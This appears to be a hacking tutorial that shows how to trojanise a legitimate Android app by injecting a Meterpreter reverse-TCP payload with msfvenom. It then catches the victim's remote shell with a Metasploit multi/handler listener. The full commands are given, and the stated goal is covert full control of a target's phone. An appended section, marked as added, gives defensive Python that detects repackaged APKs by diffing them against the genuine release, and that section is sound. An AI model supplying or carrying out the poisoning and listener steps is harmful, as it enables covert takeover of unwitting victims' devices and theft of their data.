Hack android by poisoning apps 📱
Add malware to original app (ex: Instagram, flappybird)
When the user runs the app, it acts and works like a normal app, but in a nutshell we have full control over the target's phone 👨‍💻
❗DO NOT USE THIS FOR ILLEGAL STUFF❗
REQUIREMENTS
- A decent hacking Linux distro (ex: Kali, Parrot) [ RECOMMENDED ]
- Or a system with MSFVENOM & METASPLOIT [ MUST ]
- Target and attacker must be on the same network (at least both should communicate with IPv4) [ MUST ]
1. DOWNLOAD AN APK FILE
You need an APK file to poison; you could download or create it.
2. POISON THE APP
We are going to use MSFVENOM to poison 💉
# format
msfvenom -x <downloaded-apk-file> -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<ANY_PORT> -o payload.apk
-x selects the APK file, -p refers to the payload that we are going to use.
# for my case
msfvenom -x app.apk -p android/meterpreter/reverse_tcp LHOST=192.168.11.3 LPORT=4444 -o payload.apk
This will generate a payload.apk in the current folder
3. START LISTENER
We are using METASPLOIT for the listener
The listener should be running before the target uses the app
Fire up METASPLOIT
$ msfconsole
Select exploit/multi/handler
msf6 > use exploit/multi/handler
Fill in the options; you can see all options by typing show options
We need to set LHOST, LPORT & PAYLOAD
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <IP_USED_ON_PAYLOAD>
set LPORT <PORT_USED_ON_PAYLOAD>
Run the exploit
run
Now the listener will start; wait until the victim installs the app 👨‍💻
4. DELIVER THE APP
You could use any delivery method to get the app onto the target phone
[ I'm gonna skip this part because this is not our topic ]
When the victim installs the app, you should get a Meterpreter shell back
CONGRATULATIONS, YOU HACKED INTO AN ANDROID DEVICE 🎉
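
For defenders, the APK produced in step 2 is a repackaged build: its contents no longer match the genuine release, and since the original developer's signing key is not available it has to carry a different signature. The following added example (not part of the original post) diffs a suspect APK against the genuine release of the same version. The sample archives, entry names and helper names are constructed for illustration, and only ZIP entries are compared.

```python
import hashlib
import io
import zipfile

# v1 (JAR) signature files live under META-INF/; v2/v3 signatures sit outside
# the ZIP entries and are checked with `apksigner verify --print-certs`.
SIG_SUFFIXES = (".RSA", ".DSA", ".EC", ".SF", "MANIFEST.MF")

def entry_hashes(apk_bytes):
    """Map each ZIP entry name in the APK to the SHA-256 of its contents."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        return {n: hashlib.sha256(apk.read(n)).hexdigest() for n in apk.namelist()}

def is_sig(name):
    return name.startswith("META-INF/") and name.endswith(SIG_SUFFIXES)

def compare_apk(reference, suspect):
    """Diff a suspect APK against the genuine release of the same version."""
    ref, sus = entry_hashes(reference), entry_hashes(suspect)
    added, removed = sorted(sus.keys() - ref.keys()), sorted(ref.keys() - sus.keys())
    changed = sorted(n for n in ref.keys() & sus.keys() if ref[n] != sus[n])
    return {
        "added": added, "removed": removed, "changed": changed,
        "code_or_manifest_changed": any(
            n == "AndroidManifest.xml" or n.endswith(".dex")
            for n in added + changed),
        "signature_files_differ": any(is_sig(n) for n in added + removed + changed),
    }

def build_sample(entries):
    """Constructed stand-in for an APK: a ZIP archive holding the given entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, data in entries.items():
            archive.writestr(name, data)
    return buf.getvalue()

# Constructed sample data: placeholder bytes, not real app contents.
GENUINE = build_sample({"AndroidManifest.xml": b"manifest-v1", "classes.dex": b"dex-v1",
                        "res/icon.png": b"icon", "META-INF/CERT.RSA": b"developer-sig"})
REPACKAGED = build_sample({"AndroidManifest.xml": b"manifest-modified",
                           "classes.dex": b"dex-modified", "res/icon.png": b"icon",
                           "META-INF/OTHER.RSA": b"unknown-signer-sig"})

if __name__ == "__main__":
    for key, value in compare_apk(GENUINE, REPACKAGED).items():
        print(f"{key}: {value}")
```

Any difference in code, manifest or signature files against the store release of the same version is grounds to block the install and investigate where the file came from.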